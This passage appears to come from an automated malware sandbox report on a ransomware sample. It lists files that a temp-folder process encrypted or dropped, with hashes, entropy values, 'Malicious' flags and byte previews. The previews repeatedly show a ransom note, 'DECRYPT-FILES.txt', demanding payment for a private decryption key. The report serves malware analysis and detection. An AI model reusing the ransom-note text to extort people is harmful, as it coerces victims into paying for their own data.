.b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\.metadata Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.193229761336843
Encrypted:	false
MD5:	6B95293C83293FE2FFE7F42404E033C1
SHA1:	D3109D329A2C4C30DA52DC1ED32688D468FC0559
SHA-256:	CA2FD53CAF2AC296B04A15FF1D84C5066AF7DBC64C18CCE6CF8571E1BC252266
SHA-512:	065262ACE2F3AA91C67198C504DC288D5610527C70091EBA2A14F79E14BBC8E7F4A04312B628EC3182A2867BB6164C54EC91F0AA59836D5AADC00B2A7D38AE4A
Malicious:	true
Preview:	{Oj.3..K.(.]F..?.q.......I V...Ay.a.Z.8.p./vb.n.f....p[F)..#. ..?...Pjq._.....!.....A\|..^5F"'.Eg......M.....#.....\|.a.G.0.+.........z4.....@.+Pi.D...~1 ...C..7....a.R.6...#hf.S.2..1.R.....2.p.N.%....c..E.E.;.L.6..4.Jr1Wt....v..x.R.?X...7.4.......f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.206524363625958
Encrypted:	false
MD5:	4A9595BDCB3FC89A050E8F3EF070BBA6
SHA1:	BA7358196FB6C2F35606B83B4E5F66F8D2C9B642
SHA-256:	63FFA435B7F9EC54B596D577572C39AC38EFBF57F7A4C814267FB5D8E76C9102
SHA-512:	9D46C727B2807BD3212F1D8A1D0A9EF9CE593EFF72F49E004297F63BB9F413AD47EF8DA81E8B65DB633FE1048E95CEF4EC49C90AF7B6F18FA069FFBDF61DF43A
Malicious:	true
Preview:	.........h....xW...`., !`.<._....(...<.;z}v........_h..iD...\...>X.Q.....Y...5.y..8..7......L'.~'=.(.e\|..)X..R....:O.o..~..c...\..U...J..v.K....,........H.\|.r...(A.X...o\.*.`u.6...nu......_.;%s=K..6............\|..>MvE...Z....!~.Q..........L.....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\.metadata Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	COM executable for DOS
Size (bytes):	264
Entropy (8bit):	7.2147243524001246
Encrypted:	false
MD5:	D15053A8D12141D71BFB175F4D4F2DD9
SHA1:	D9764E42A444D181E0FFCF44C5792B9A05F46363
SHA-256:	0292986641A9235E335788806325F3B6D6A2695615FE4D2DD1041251B6ED6BF8
SHA-512:	6142E1EAF62E83565B2CC4A91B17D794C4187BD2F3D886876E8AD36B1C4FDB06A6C80E7B0F57D7BBC82935FCB45462F900C4C21724A5ABABB6647298684872F9
Malicious:	true
Preview:	..SW.M..@.4.o.....Ei.,W.+'.0..=...j.S.=Z.<../tvE....^.V.<...c.~2}.D.R.1b.<.~.....w..1}XT....`..W....m..F..Pxs.`6}..3...W...k#......u."b4..?.Q$;..e4.....L......*7.9..;...r...X.I.;\........+{.... .W..L......V..33./i....P.f.'ZGw.......t.:...(.Z....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.596784432001739
Encrypted:	false
MD5:	C8D041E6391FB79A6D085AA1022F5D7C
SHA1:	65F6FE221CC3D239242F1BB3279C44448464773A
SHA-256:	58E7F29E144E6B50E9EAB76358E4951E41A55CA1F722AEE33B4255D0ACE066FA
SHA-512:	118F29B913C345B2FE0CDD9E5577A0F4612916916CAAF64E5153C0748FBF66612635304DCEC602247DE6547A3D89DF26699DDBD411E18416291C3C32FBAE5C99
Malicious:	true
Preview:	{u.".....R.L.\|......]M...@-..[W{..\|.q..E[P5.W^E..PGf$.Zqd..<..DL.=.t.j...n...... ..........[.E.}Y...Y{,......H..8Ka}.x.Y...Su.D.....b.IFp..-...j.j..w.+".H`G..C#....<Q..@....$.[/<...\|. .....N.Yy.A.4z....M......W.....e^.4.o.H%.`WNJ....c..h....f.af.S......U...q.xZoB=.....#`..7...Z..2tc..>1j.GT.d0...~)T...vRe......z..... ...].../....X...9Q..0..+?...5..).z.>6$.......>UU.yV=%\t~C .5.B......E...X6.o.g..D..:....N:.`%\O.E...:.FuGe....4.K..34%]..y..9?+.\|.VnH..o.e....(.d.....s......?.d>0....j....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\webapps.json Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.75915862577588
Encrypted:	false
MD5:	1D18349CF4C578C7A489448D2F313BC6
SHA1:	821DECB61E8A2417B9AD9C4F3A86F377314FB252
SHA-256:	F2497661DA9B10645984AC2B7491C9EB074D74795078A4A3D536DB21F42805D6
SHA-512:	3C65D7C7E18C990F857A3CFAAF9885FFB686B9F042E77F4AD84115B9B7002C9F1053E8658E9BA3A97D47535C215220DE7EC00DE89E792663AC593F6E2CC8905D
Malicious:	true
Preview:	.....o..)..f.Q...........2M..(.$`..g.....\|.....;.\i.q..P7.......N.Qps.?YK..t.>.uG.O...D.~..k.\|.`.....7(.3e..M........d.YT.<@m...w...R..~q../.Q.B..).......wf....j$\n......]......._`,.{....1-.I......A....<'.......up.:v.Y....=.`a..>7a....../......f.af.#..4l......WI......Ok..F.....4....ei.\..e.3...:...{..G.........Z.L..Z.....~m~.`a........Nb...C.vx..D........1x.qN.$.. .0...[.<ofP..Y.@O...I.G/1.v..f.....Z..-MHm.......d...:...{......PP<.....e.um..N.Fo...}.M.\|...h.c.4....rt....'+.....%(.\.....f.afK.....zl...KT.W.=.wx.T. .3)....?.M2.a..^.#v.-h....E.~..~..f.:{)\U..s8...4.s.\.#.....zy.@m.%......U....>S.2k......NO...U..G..%.B..,)....'..}.....$..3...E.....b....T...3.(9.m.zMT.K...,H?.x.EOF(&..Ys........Pl....0...K..@/w...v?[.KF...(~...~...n.@.....f.af.1._F.jt....q[z.........2H..}....._.=.oY.4&....!%..u......51....@.7u.......i.Z9(H..l)KDG.r~.>>.....6.G5......No.+.,.........~.U.x..n.C...mU....>..L...k6....(N.J.Yw...z..F..=.D.u).y..p.....+'.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Sun\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	36752
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD507F9F474F821FEF28D4BE121FF6FF
SHA1:	CE9F35A9FD98C71F7ECDE1EAA9BE022F35E5AEA6
SHA-256:	D38AD86F8AC32279BC30D2B832AD2CFD6ABE708F3DBA9575B2B30EF3D78E934A
SHA-512:	65396D5107E23015C429C0E58730A673C38B9A06F98C91F097D664F11A86C2BCA4A837AC03999DE69CE2B956721E6D194E57526D6EFA5DE267134E50C979E92F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Contacts\user.contact Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.218438178124924
Encrypted:	false
MD5:	454B1E29E177349934AF2C1E2C494013
SHA1:	E4AC103D5BF15CA972CFEDC02276E073DB8877FF
SHA-256:	41EBCFFEBA3D9F8F770E0E784082D586CE630251DC40A471A44C32077115F6B9
SHA-512:	87EF966B8A6521AFBC231D21A4D56A1D73052A7474ABACAB12331C56FC45BE2841D4075869F4CFD95CB3DCBA857620B6AAEFDB8CB5B00F170E1CFF142E28F814
Malicious:	false
Preview:	x`....8.~%...........bV..!...:.!}.....o..+...R.c).....Q.R...........U..O.x.V.@..2"B;>.j>...L.P.6.uX..T...C......Z..#HrP.r.".4...[.B.k......X!..N..{...-.P.<E.BY..........S^.......p...c..Sl....l._z....^.......S6....]G..".o.^.um)....J....7..).....f.af

C:\Users\user\Desktop\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	36752
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD507F9F474F821FEF28D4BE121FF6FF
SHA1:	CE9F35A9FD98C71F7ECDE1EAA9BE022F35E5AEA6
SHA-256:	D38AD86F8AC32279BC30D2B832AD2CFD6ABE708F3DBA9575B2B30EF3D78E934A
SHA-512:	65396D5107E23015C429C0E58730A673C38B9A06F98C91F097D664F11A86C2BCA4A837AC03999DE69CE2B956721E6D194E57526D6EFA5DE267134E50C979E92F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2376
Entropy (8bit):	7.884736743036306
Encrypted:	false
MD5:	67C93A6745EA340F1DA5D910D45F1F7C
SHA1:	DBB64848CAF268CE74A448ED1DE6D137C9C22C41
SHA-256:	C8A8470D0DCB831695D1FA20BE5203A33316B47EF046850C08FAE249165F7D3F
SHA-512:	7BC3834D07B1DD80C6F53A8F81393ADFE6AC1ED9D34A0EEDC164D54711AB23ED4A9A61BA58218BFCFD2623F596FAF4462F458888E9560A857FB5AB733610D95B
Malicious:	true
Preview:	..m..TV3Mg.`V..n...\|.....!....o...B.u.....I.....).O........HJ..t=Z.?\..rXf1.....i.M.....k...b5._}H.....a...4.0.L.U....i.+...Guj.&.g......n.F.7.7..f.[...2.u...<.....eE.5#/#m.tZ......).VF.#..[w\|`\...n..U....L}P.D..zO....U..%.....Q:..D..y%.......f.af....p...><...Y"..D.0.G.9...L.."..;...f..#.;........l0.D..q.%...I7x.z....!..H..."..H....a..D...o.W.;.4..mdJV.=.....A6..O......YQ1.de..'=YM.c......GEq.. :........=..... ....r...>.$g..K.>+.V..v.......x..r..b~06....7..b...W..4&..r..r..5fRG.Pg.....f.af....gh[G...'q...{..t...Q.$....Yu..c0tmK....."..h.iF.4..@r.#7...XD...a...s?....4..v..d....."Z..w.&.Y..v..g..lFDH.Y.{..MA.Z..;.}.....R...M....R...O.5......8.b>.aS..Z....\|.B.v-R.....s0.....`.g9.n.Ap.X...;...>...}xh.p..Y].v.I.6.fR}..^.K....B..=..).......f.af.P......E...s-.....R....:...=m.-...N...g.:u....M"....Y.2C...%.^+U.........k..f.n0..G.Zj..D..Bt..R..)q.x.(..Fl.-....M..u....\..<...Q..P..q..p.,.U..7......u.^...wO....?.%(......R......c.+...3.

C:\Users\user\Desktop\PALRGUCVEH\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. 